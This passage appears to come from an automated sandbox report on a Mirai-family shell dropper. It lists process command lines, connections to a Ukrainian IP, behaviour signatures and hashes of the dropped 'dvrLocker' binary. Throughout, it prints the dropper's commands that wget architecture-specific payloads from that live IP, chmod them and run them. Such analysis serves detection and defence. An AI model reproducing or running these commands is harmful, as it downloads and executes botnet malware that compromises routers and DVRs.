/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp

Files

/tmp/lib/dvrLocker

MD5 bb9275394716c60d1941432c7085ca13
SHA1 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 03:32

Reported

2024-11-09 03:34

Platform

debian9-mipsel-20240226-en

Max time kernel

60s

Max time network

65s

Command Line

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh N/A

Processes

/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/105/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/115/exe]

/bin/ls

[ls -l /proc/116/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/142/exe]

/bin/ls

[ls -l /proc/149/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/166/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/239/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/323/exe]

/bin/ls

[ls -l /proc/326/exe]

/bin/ls

[ls -l /proc/328/exe]

/bin/ls

[ls -l /proc/330/exe]

/bin/ls

[ls -l /proc/334/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/374/exe]

/bin/ls

[ls -l /proc/376/exe]

/bin/ls

[ls -l /proc/386/exe]

/bin/ls

[ls -l /proc/390/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/486/exe]

/bin/ls

[ls -l /proc/491/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/532/exe]

/bin/ls

[ls -l /proc/533/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/674/exe]

/bin/ls

[ls -l /proc/688/exe]

/bin/ls

[ls -l /proc/689/exe]

/bin/ls

[ls -l /proc/69/exe]

/bin/ls

[ls -l /proc/691/exe]

/bin/ls

[ls -l /proc/693/exe]

/bin/ls

[ls -l /proc/694/exe]

/bin/ls

[ls -l /proc/695/exe]

/bin/ls

[ls -l /proc/696/exe]

/bin/ls

[ls -l /proc/698/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/70/exe]

/bin/ls

[ls -l /proc/71/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp

Files

/tmp/lib/dvrLocker

MD5 bb9275394716c60d1941432c7085ca13
SHA1 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d